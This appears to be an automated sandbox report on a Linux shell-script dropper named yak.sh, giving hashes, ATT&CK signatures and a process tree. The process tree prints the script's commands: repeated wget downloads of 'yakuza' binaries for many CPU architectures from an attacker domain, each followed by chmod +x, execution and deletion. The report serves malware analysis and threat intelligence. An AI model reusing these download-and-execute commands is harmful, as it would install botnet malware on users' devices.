Analysis
-
max time kernel
8s -
max time network
10s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19-10-2024 11:40
Static task
static1
Behavioral task
behavioral1
Sample
yak.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
yak.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
yak.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
yak.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
yak.sh
-
Size
1KB
-
MD5
d38e8407bbc72cbd2057efdd3d8b7a05
-
SHA1
89e1ebb28cea58b8f9eb728383f8cb565d58518e
-
SHA256
ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1
-
SHA512
c0a0450a308555a0c3ff52d7d8fc0ce8ff55b9bca8b700cdf87b222b2bfe2ea112de21aa59a8535020b7d4636f64334606494da99e007caecb09ff3ae69589c9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 740 chmod 758 chmod 669 chmod 674 chmod 678 chmod 682 chmod 686 chmod 721 chmod 692 chmod 713 chmod 727 chmod 734 chmod 749 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/yakuza.mips 670 yakuza.mips -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 675 yakuza.mipsel 676 rm 646 wget 670 yakuza.mips 672 rm 673 wget -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yakuza.ppc wget File opened for modification /tmp/yakuza.mips wget
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵PID:639
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:646
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:669
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:670
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:672
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:673
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:675
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:676
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.sh2⤵PID:677
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:679
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:680
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.x862⤵PID:681
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:683
-
-
/bin/rmrm -rf yakuza.x862⤵PID:684
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm62⤵PID:685
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:687
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:688
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.i6862⤵PID:689
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:694
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:695
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.ppc2⤵
- Writes file to tmp directory
PID:697
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:715
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:717
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.i5862⤵PID:718
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:722
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:723
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.m68k2⤵PID:725
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:729
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:730
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm42⤵PID:732
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:735
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:736
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm52⤵PID:738
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:744
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:745
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm72⤵PID:746
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:751
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:752
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.sparc2⤵PID:755
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:759
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:761
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD5983c5d72544a32a574f5e914253a618b
SHA176cd31603cb4e7fa0c78e37c62b5857098f78442
SHA256fc4a02d90a8b9efeb4dfba835d514b728399bc8424253341a30e13b40cb15373
SHA5127a667b29715b153c58abe022d862f0fcc789b24f5f7cd8fb94c5079d0c513d54ba37b061979993c6a3a1ebe1046ceeb03581119b542bef7b1abe8dc6b300c9bf